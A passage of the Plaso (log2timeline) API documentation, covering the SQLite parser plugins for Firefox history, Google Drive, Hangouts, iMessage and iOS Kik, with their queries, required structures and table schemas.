'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER , guid TEXT)', 'sqlite_stat1': 'CREATE TABLE sqlite_stat1(tbl, idx, stat)'}]

264 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

URL_CACHE_QUERY = 'SELECT h.id AS id, p.url, p.rev_host FROM moz_places p, moz_historyvisits h WHERE p.id = h.place_id' class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventData Bases: plaso.containers.events.EventData Firefox bookmark annotation event data. content annotation content. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str title title of the bookmark folder. Type str url bookmarked URL. Type str DATA_TYPE = 'firefox:places:bookmark_annotation' class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData Bases: plaso.containers.events.EventData Firefox bookmark event data. host visited hostname. Type str offset identifier of the row, from which the event data was extracted. Type str places_title places title. Type str query SQL query that was used to obtain the event data. Type str title title of the bookmark folder. Type str

5.1. Subpackages 265 Plaso (log2timeline), Release 20210606

type bookmark type. Type int url bookmarked URL. Type str visit_count visit count. Type int DATA_TYPE = 'firefox:places:bookmark' class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventData Bases: plaso.containers.events.EventData Firefox bookmark folder event data. offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str title title of the bookmark folder. Type str DATA_TYPE = 'firefox:places:bookmark_folder' class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData Bases: plaso.containers.events.EventData Firefox page visited event data. from_visit URL that referred to the visited page. Type str hidden value to indicated if the URL was hidden. Type str host visited hostname. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data.

266 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str title title of the visited page. Type str typed value to indicated if the URL was typed. Type str url URL of the visited page. Type str visit_count visit count. Type int visit_type transition type for the event. Type str DATA_TYPE = 'firefox:places:page_visited' plaso.parsers.sqlite_plugins.gdrive module

SQLite parser plugin for Google Drive snapshot database files. class plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Drive snapshot database files. The Google Drive snapshot database file is typically stored in: snapshot.db CLOUD_PATH_CACHE_QUERY = 'SELECT cloud_entry.filename, cloud_entry.resource_id, cloud_relations.parent_resource_id AS parent FROM cloud_entry, cloud_relations WHERE cloud_entry.doc_type = 0 AND cloud_entry.resource_id = cloud_relations.child_resource_id' DATA_FORMAT = 'Google Drive snapshot SQLite database (snapshot.db) file' GetCloudPath(resource_id, cache, database) Return cloud path given a resource id. Parameters • resource_id (str) – resource identifier for the file. • cache (SQLiteCache) – cache. • database (SQLiteDatabase) – database. Returns full path to the resource value. Return type str GetLocalPath(inode, cache, database) Return local path for a given inode.

5.1. Subpackages 267 Plaso (log2timeline), Release 20210606

Parameters • inode (int) – inode number for the file. • cache (SQLiteCache) – cache. • database (SQLiteDatabase) – database. Returns full path, including the filename of the given inode value. Return type str LOCAL_PATH_CACHE_QUERY = 'SELECT local_relations.child_inode_number, local_relations.parent_inode_number, local_entry.filename FROM local_relations, local_entry WHERE local_relations.child_inode_number = local_entry.inode_number' NAME = 'google_drive' ParseCloudEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs) Parses a cloud entry row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. • cache (SQLiteCache) – cache. • database (SQLiteDatabase) – database. ParseLocalEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs) Parses a local entry row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. • cache (Optional[SQLiteCache]) – cache. • database (Optional[SQLiteDatabase]) – database. QUERIES = [('SELECT cloud_entry.resource_id, cloud_entry.filename, cloud_entry.modified, cloud_entry.created, cloud_entry.size, cloud_entry.doc_type, cloud_entry.shared, cloud_entry.checksum, cloud_entry.url, cloud_relations.parent_resource_id FROM cloud_entry, cloud_relations WHERE cloud_relations.child_resource_id = cloud_entry.resource_id AND cloud_entry.modified IS NOT NULL;', 'ParseCloudEntryRow'), ('SELECT inode_number, filename, modified, checksum, size FROM local_entry WHERE modified IS NOT NULL;', 'ParseLocalEntryRow')] REQUIRED_STRUCTURE = {'cloud_entry': frozenset({'checksum', 'created', 'doc_type', 'filename', 'modified', 'resource_id', 'shared', 'size', 'url'}), 'cloud_relations': frozenset({'child_resource_id', 'parent_resource_id'}), 'local_entry': frozenset({'checksum', 'filename', 'inode_number', 'modified', 'size'}), 'local_relations': frozenset({'child_inode_number', 'parent_inode_number'})}

268 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SCHEMAS = [{'cloud_entry': 'CREATE TABLE cloud_entry (resource_id TEXT, filename TEXT, modified INTEGER, created INTEGER, acl_role INTEGER, doc_type INTEGER, removed INTEGER, url TEXT, size INTEGER, checksum TEXT, shared INTEGER, PRIMARY KEY (resource_id))', 'cloud_relations': 'CREATE TABLE cloud_relations (child_resource_id TEXT, parent_resource_id TEXT, UNIQUE (child_resource_id, parent_resource_id), FOREIGN KEY (child_resource_id) REFERENCES cloud_entry(resource_id), FOREIGN KEY (parent_resource_id) REFERENCES cloud_entry(resource_id))', 'local_entry': 'CREATE TABLE local_entry (inode_number INTEGER, filename TEXT, modified INTEGER, checksum TEXT, size INTEGER, PRIMARY KEY (inode_number))', 'local_relations': 'CREATE TABLE local_relations (child_inode_number INTEGER, parent_inode_number INTEGER, UNIQUE (child_inode_number), FOREIGN KEY (parent_inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (child_inode_number) REFERENCES local_entry(inode_number))', 'mapping': 'CREATE TABLE mapping (inode_number INTEGER, resource_id TEXT, UNIQUE (inode_number), FOREIGN KEY (inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (resource_id) REFERENCES cloud_entry(resource_id))', 'overlay_status': 'CREATE TABLE overlay_status (path TEXT, overlay_status INTEGER, PRIMARY KEY (path))'}] class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData Bases: plaso.containers.events.EventData Google Drive snapshot cloud entry event data. doc_type document type. Type int path path of the file. Type str query SQL query that was used to obtain the event data. Type str shared True if the file is shared, False if the file is private. Type bool size size of the file. Type int url URL of the file. Type str DATA_TYPE = 'gdrive:snapshot:cloud_entry' class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData Bases: plaso.containers.events.EventData Google Drive snapshot local entry event data. path path of the file.

5.1. Subpackages 269 Plaso (log2timeline), Release 20210606

Type str query SQL query that was used to obtain the event data. Type str size size of the file. Type int DATA_TYPE = 'gdrive:snapshot:local_entry' plaso.parsers.sqlite_plugins.hangouts_messages module

SQLite parser plugin for Google Hangouts conversations database files. class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData Bases: plaso.containers.events.EventData GoogleHangouts Message event data. body content of the SMS text message. Type str message_status message status. Type int message_type message type. Type int offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str sender Name with the sender. Type str DATA_TYPE = 'android:messaging:hangouts' class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Google Hangouts conversations database files. The Google Hangouts conversations database file is typically stored in: /data/com.google.android.talk/databases/babel.db

270 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

This SQLite database is the conversation database for conversations, participant names, messages, and information about the Google Hangout event. There can be multiple babel.db databases, and each database name will be followed by an integer starting with 0, for example: “babel0.db,babel1.db,babel3.db”. DATA_FORMAT = 'Google Hangouts conversations SQLite database (babel.db) file' NAME = 'hangouts_messages' ParseMessagesRow(parser_mediator, query, row, **unused_kwargs) Parses an Messages row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT messages._id, participants.full_name, text, messages.timestamp,status, type FROM messages INNER JOIN participants ON messages.author_chat_id=participants.chat_id;', 'ParseMessagesRow')] REQUIRED_STRUCTURE = {'blocked_people': frozenset({}), 'messages': frozenset({'_id', 'author_chat_id', 'status', 'text', 'timestamp', 'type'}), 'participants': frozenset({'chat_id', 'full_name'})}

5.1. Subpackages 271 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'blocked_people': 'CREATE TABLE blocked_people (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY, participant_row_id INT, participant_type INT, conversation_id TEXT, sequence INT, active INT, invitation_status INT DEFAULT(0), UNIQUE (conversation_id,participant_row_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (participant_row_id) REFERENCES participants(_id))', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY, conversation_id TEXT, conversation_type INT, latest_message_timestamp INT DEFAULT(0), latest_message_expiration_timestamp INT, metadata_present INT,notification_level INT, name TEXT, generated_name TEXT, snippet_type INT, snippet_text TEXT, snippet_image_url TEXT, snippet_author_gaia_id TEXT, snippet_author_chat_id TEXT, snippet_message_row_id INT, snippet_selector INT, snippet_status INT, snippet_new_conversation_name TEXT, snippet_participant_keys TEXT, snippet_sms_type TEXT, previous_latest_timestamp INT, status INT, view INT, inviter_gaia_id TEXT, inviter_chat_id TEXT, inviter_affinity INT, is_pending_leave INT, account_id INT, is_otr INT, packed_avatar_urls TEXT, self_avatar_url TEXT, self_watermark INT DEFAULT(0), chat_watermark INT DEFAULT(0), hangout_watermark INT DEFAULT(0), is_draft INT, sequence_number INT, call_media_type INT DEFAULT(0), has_joined_hangout INT, has_chat_notifications DEFAULT(0),has_video_notifications DEFAULT(0),last_hangout_event_time INT, draft TEXT, otr_status INT, otr_toggle INT, last_otr_modification_time INT, continuation_token BLOB, continuation_event_timestamp INT, has_oldest_message INT DEFAULT(0), sort_timestamp INT, first_peak_scroll_time INT, first_peak_scroll_to_message_timestamp INT, second_peak_scroll_time INT, second_peak_scroll_to_message_timestamp INT, conversation_hash BLOB, disposition INT DEFAULT(0), has_persistent_events INT DEFAULT(-1), transport_type INT DEFAULT(1), default_transport_phone TEXT, sms_service_center TEXT, is_temporary INT DEFAULT (0), sms_thread_id INT DEFAULT (-1), chat_ringtone_uri TEXT, hangout_ringtone_uri TEXT, snippet_voicemail_duration INT DEFAULT (0), share_count INT DEFAULT(0), has_unobserved TEXT, last_share_timestamp INT DEFAULT(0), gls_status INT DEFAULT(0), gls_link TEXT, is_guest INT DEFAULT(0), UNIQUE (conversation_id ))', 'dismissed_contacts': 'CREATE TABLE dismissed_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'event_suggestions': 'CREATE TABLE event_suggestions (_id INTEGER PRIMARY KEY, conversation_id TEXT, event_id TEXT, suggestion_id TEXT, timestamp INT, expiration_time_usec INT, type INT, gem_asset_url STRING, gem_horizontal_alignment INT, matched_message_substring TEXT, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,suggestion_id) ON CONFLICT REPLACE)', 'merge_keys': 'CREATE TABLE merge_keys (_id INTEGER PRIMARY KEY, conversation_id TEXT, merge_key TEXT, UNIQUE (conversation_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE )', 'merged_contact_details': 'CREATE TABLE merged_contact_details (_id INTEGER PRIMARY KEY, merged_contact_id INT, lookup_data_type INT, lookup_data TEXT, lookup_data_standardized TEXT, lookup_data_search TEXT, lookup_data_label TEXT, needs_gaia_ids_resolved INT DEFAULT (1), is_hangouts_user INT DEFAULT (0), gaia_id TEXT, avatar_url TEXT, display_name TEXT, last_checked_ts INT DEFAULT (0), lookup_data_display TEXT, detail_affinity_score REAL DEFAULT (0.0), detail_logging_id TEXT, is_in_viewer_dasher_domain INT DEFAULT (0), FOREIGN KEY (merged_contact_id) REFERENCES merged_contacts(_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'merged_contacts': 'CREATE TABLE merged_contacts (_id INTEGER PRIMARY KEY, contact_lookup_key TEXT, contact_id INT, raw_contact_id INT, display_name TEXT, avatar_url TEXT, is_frequent INT DEFAULT (0), is_favorite INT DEFAULT (0), 272 contact_source INT DEFAULT(0), frequent_order INT, person_logging_idChapter 5. TEXT, plaso package person_affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))', 'messages': 'CREATE TABLE messages (_id INTEGER PRIMARY KEY, message_id TEXT, message_type INT, conversation_id TEXT, author_chat_id TEXT, author_gaia_id TEXT, text TEXT, timestamp INT, delete_after_read_timetamp INT, status INT, type INT, local_url TEXT, remote_url TEXT, attachment_content_type TEXT, width_pixels INT, height_pixels INT, stream_id TEXT, image_id TEXT, album_id TEXT, latitude DOUBLE, longitude DOUBLE, address ADDRESS, notification_level INT, expiration_timestamp INT, notified_for_failure INT DEFAULT(0), off_the_record INT DEFAULT(0), transport_type INT NOT NULL DEFAULT(1), transport_phone TEXT, external_ids TEXT, sms_timestamp_sent INT DEFAULT(0), sms_priority INT DEFAULT(0), sms_message_size INT DEFAULT(0), mms_subject TEXT, sms_raw_sender TEXT, sms_raw_recipients TEXT, persisted INT DEFAULT(1), sms_message_status INT DEFAULT(-1), sms_type INT DEFAULT(-1), stream_url TEXT, attachment_target_url TEXT, attachment_name TEXT, image_rotation INT DEFAULT (0), new_conversation_name TEXT, participant_keys TEXT, forwarded_mms_url TEXT, forwarded_mms_count INT DEFAULT(0), attachment_description TEXT, attachment_target_url_description TEXT, attachment_target_url_name TEXT, attachment_blob_data BLOB,attachment_uploading_progress INT DEFAULT(0), sending_error INT DEFAULT(0), stream_expiration INT, voicemail_length INT DEFAULT (0), call_media_type INT DEFAULT(0), last_seen_timestamp INT DEFAULT(0), observed_status INT DEFAULT(2), receive_type INT DEFAULT(0), init_timestamp INT DEFAULT(0), in_app_msg_latency INT DEFAULT(0), notified INT DEFAULT(0), alert_in_conversation_list INT DEFAULT(0), attachments BLOB, is_user_mentioned INT DEFAULT(0), local_id TEXT, request_task_row_id INT DEFAULT(-1), FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,message_id) ON CONFLICT REPLACE)', 'mms_notification_inds': 'CREATE TABLE mms_notification_inds (_id INTEGER PRIMARY KEY, content_location TEXT, transaction_id TEXT, from_address TEXT, message_size INT DEFAULT(0), expiry INT)', 'multipart_attachments': 'CREATE TABLE multipart_attachments (_id INTEGER PRIMARY KEY, message_id TEXT, conversation_id TEXT, url TEXT, content_type TEXT, width INT, height INT, FOREIGN KEY (message_id, conversation_id) REFERENCES messages(message_id, conversation_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'participant_email_fts': 'CREATE VIRTUAL TABLE participant_email_fts USING fts4(content="merged_contact_details", gaia_id,lookup_data)', 'participant_email_fts_docsize': "CREATE TABLE 'participant_email_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participant_email_fts_segdir': "CREATE TABLE 'participant_email_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participant_email_fts_segments': "CREATE TABLE 'participant_email_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participant_email_fts_stat': "CREATE TABLE 'participant_email_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'participants': "CREATE TABLE participants (_id INTEGER PRIMARY KEY, participant_type INT DEFAULT 1, gaia_id TEXT, chat_id TEXT, phone_id TEXT, circle_id TEXT, first_name TEXT, full_name TEXT, fallback_name TEXT, profile_photo_url TEXT, batch_gebi_tag STRING DEFAULT('-1'), blocked INT DEFAULT(0), in_users_domain BOOLEAN, UNIQUE (circle_id) ON CONFLICT REPLACE, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)", 'participants_fts': 'CREATE VIRTUAL TABLE participants_fts USING fts4(content="participants",gaia_id,full_name)', 'participants_fts_docsize': "CREATE TABLE 'participants_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participants_fts_segdir': "CREATE TABLE 'participants_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participants_fts_segments': "CREATE TABLE 'participants_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participants_fts_stat': "CREATE TABLE 'participants_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'presence': 'CREATE TABLE presence (_id INTEGER PRIMARY KEY, gaia_id TEXT NOT NULL, reachable INT DEFAULT(0), reachable_time INT DEFAULT(0), available INT DEFAULT(0), available_time INT DEFAULT(0), status_message TEXT, status_message_time INT DEFAULT(0), call_type INT DEFAULT(0), call_type_time INT DEFAULT(0), device_status INT DEFAULT(0), device_status_time INT DEFAULT(0), last_seen INT DEFAULT(0), last_seen_time INT DEFAULT(0), location BLOB, location_time INT DEFAULT(0), UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'recent_calls': 'CREATE TABLE recent_calls (_id INTEGER PRIMARY KEY, normalized_number TEXT NOT NULL, phone_number TEXT, contact_id TEXT, call_timestamp INT, call_type INT, contact_type INT, call_rate TEXT, is_free_call BOOLEAN)', 'search': 'CREATE TABLE search (search_key TEXT NOT NULL,continuation_token TEXT,PRIMARY KEY (search_key))', 'sticker_albums': 'CREATE TABLE sticker_albums (album_id TEXT NOT NULL, title TEXT, cover_photo_id TEXT, last_used INT DEFAULT(0), PRIMARY KEY (album_id))', 'sticker_photos': 'CREATE TABLE sticker_photos (photo_id TEXT NOT NULL, album_id TEXT NOT NULL, url TEXT NOT NULL, file_name TEXT, last_used INT DEFAULT(0), PRIMARY KEY (photo_id), FOREIGN KEY (album_id) REFERENCES sticker_albums(album_id) ON DELETE CASCADE)', 'suggested_contacts': 'CREATE TABLE suggested_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, first_name TEXT, packed_circle_ids TEXT, profile_photo_url TEXT, sequence INT, suggestion_type INT, logging_id TEXT, affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))'}] Plaso (log2timeline), Release 20210606

plaso.parsers.sqlite_plugins.imessage module

SQLite parser plugin for MacOS and iOS iMessage database files. class plaso.parsers.sqlite_plugins.imessage.IMessageEventData Bases: plaso.containers.events.EventData iMessage and SMS event data. attachment_location location of the attachment. Type str imessage_id mobile number or email address the message was sent to or received from. Type str message_type value to indicate the message was sent (1) or received (0). Type int offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str read_receipt True if the message read receipt was received. Type bool service service, which is either SMS or iMessage. Type str text content of the message. Type str DATA_TYPE = 'imessage:event:chat' class plaso.parsers.sqlite_plugins.imessage.IMessagePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS and iOS iMessage database files. The iMessage database file is typically stored in: chat.db sms.db DATA_FORMAT = 'MacOS and iOS iMessage database (chat.db, sms.db) file' NAME = 'imessage' ParseMessageRow(parser_mediator, query, row, **unused_kwargs) Parses a message row. Parameters

5.1. Subpackages 273 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT m.date, m.ROWID, h.id AS imessage_id, m.is_read AS read_receipt, m.is_from_me AS message_type, m.service, a.filename AS"attachment_location", m.text FROM message AS m JOIN handle AS h ON h.ROWID = m.handle_id LEFT OUTER JOIN message_attachment_join AS maj ON m.ROWID = maj.message_id LEFT OUTER JOIN attachment AS a ON maj.attachment_id = a.ROWID', 'ParseMessageRow')] REQUIRED_STRUCTURE = {'attachment': frozenset({'ROWID', 'filename'}), 'handle': frozenset({'ROWID', 'id'}), 'message': frozenset({'ROWID', 'date', 'handle_id', 'is_from_me', 'is_read', 'service', 'text'}), 'message_attachment_join': frozenset({'attachment_id', 'message_id'})}

274 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SCHEMAS = [{'_SqliteDatabaseProperties': 'CREATE TABLE _SqliteDatabaseProperties (key TEXT, value TEXT, UNIQUE(key))', 'attachment': 'CREATE TABLE attachment (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, created_date INTEGER DEFAULT 0, start_date INTEGER DEFAULT 0, filename TEXT, uti TEXT, mime_type TEXT, transfer_state INTEGER DEFAULT 0, is_outgoing INTEGER DEFAULT 0, user_info BLOB, transfer_name TEXT, total_bytes INTEGER DEFAULT 0)', 'chat': 'CREATE TABLE chat (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, style INTEGER, state INTEGER, account_id TEXT, properties BLOB, chat_identifier TEXT, service_name TEXT, room_name TEXT, account_login TEXT, is_archived INTEGER DEFAULT 0, last_addressed_handle TEXT, display_name TEXT, group_id TEXT, is_filtered INTEGER, successful_query INTEGER)', 'chat_handle_join': 'CREATE TABLE chat_handle_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, handle_id INTEGER REFERENCES handle (ROWID) ON DELETE CASCADE, UNIQUE(chat_id, handle_id))', 'chat_message_join': 'CREATE TABLE chat_message_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, PRIMARY KEY (chat_id, message_id))', 'deleted_messages': 'CREATE TABLE deleted_messages (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, guid TEXT NOT NULL)', 'handle': 'CREATE TABLE handle (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, id TEXT NOT NULL, country TEXT, service TEXT NOT NULL, uncanonicalized_id TEXT, UNIQUE (id, service) )', 'message': 'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0, subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT, account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER, is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0, is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0, is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0, is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0, cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0, is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0, other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0, share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0, message_source INTEGER DEFAULT 0)', 'message_attachment_join': 'CREATE TABLE message_attachment_join (message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, attachment_id INTEGER REFERENCES attachment (ROWID) ON DELETE CASCADE, UNIQUE(message_id, attachment_id))'}] plaso.parsers.sqlite_plugins.interface module

Interface for SQLite database file parser plugins. class plaso.parsers.sqlite_plugins.interface.SQLitePlugin Bases: plaso.parsers.plugins.BasePlugin SQLite parser plugin. CheckRequiredTablesAndColumns(database) Check if the database has the minimal structure required by the plugin.

5.1. Subpackages 275 Plaso (log2timeline), Release 20210606

Parameters database (SQLiteDatabase) – the database who’s structure is being checked. Returns True if the database has the required tables and columns defined by the plugin, or False if it does not or if the plugin does not define required tables and columns. The database can have more tables and/or columns than specified by the plugin and still return True. Return type bool CheckSchema(database) Checks the schema of a database with that defined in the plugin. Parameters database (SQLiteDatabase) – SQLite database to check. Returns True if the schema of the database matches that defined by the plugin, or False if the schemas do not match or no schema is defined by the plugin. Return type bool DATA_FORMAT = 'SQLite database file' NAME = 'sqlite_plugin' Process(parser_mediator, cache=None, database=None, **unused_kwargs) Extracts events from a SQLite database. Parameters • parser_mediator (ParserMediator) – parser mediator. • cache (Optional[SQLiteCache]) – cache. • database (Optional[SQLiteDatabase]) – database. Raises ValueError – If the database or cache value are missing. QUERIES = [] REQUIRED_STRUCTURE = {} REQUIRES_SCHEMA_MATCH = False SCHEMAS = [] plaso.parsers.sqlite_plugins.kik_ios module

SQLite parser plugin for iOS Kik messenger database files. class plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData Bases: plaso.containers.events.EventData Kik message event data. body content of the message. Type str message_status message status, such as: read, unread, not sent, delivered, etc. Type str

276 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

message_type message type, either Sent or Received. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str username unique username of the sender or receiver. Type str DATA_TYPE = 'ios:kik:messaging' class plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for iOS Kik messenger database files. The OS Kik messenger database file is typically stored in: kik.sqlite DATA_FORMAT = 'iOS Kik messenger SQLite database (kik.sqlite) file' NAME = 'kik_messenger' ParseMessageRow(parser_mediator, query, row, **unused_kwargs) Parses a message row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT a.Z_PK AS id, b.ZUSERNAME, b.ZDISPLAYNAME,a.ZRECEIVEDTIMESTAMP, a.ZSTATE, a.ZTYPE, a.ZBODY FROM ZKIKMESSAGE a JOIN ZKIKUSER b ON b.ZEXTRA = a.ZUSER', 'ParseMessageRow')] REQUIRED_STRUCTURE = {'ZKIKMESSAGE': frozenset({'ZBODY', 'ZRECEIVEDTIMESTAMP', 'ZSTATE', 'ZTYPE', 'ZUSER', 'Z_PK'}), 'ZKIKUSER': frozenset({'ZDISPLAYNAME', 'ZEXTRA', 'ZUSERNAME'})}

5.1. Subpackages 277 Plaso (log2timeline), Release 20210606

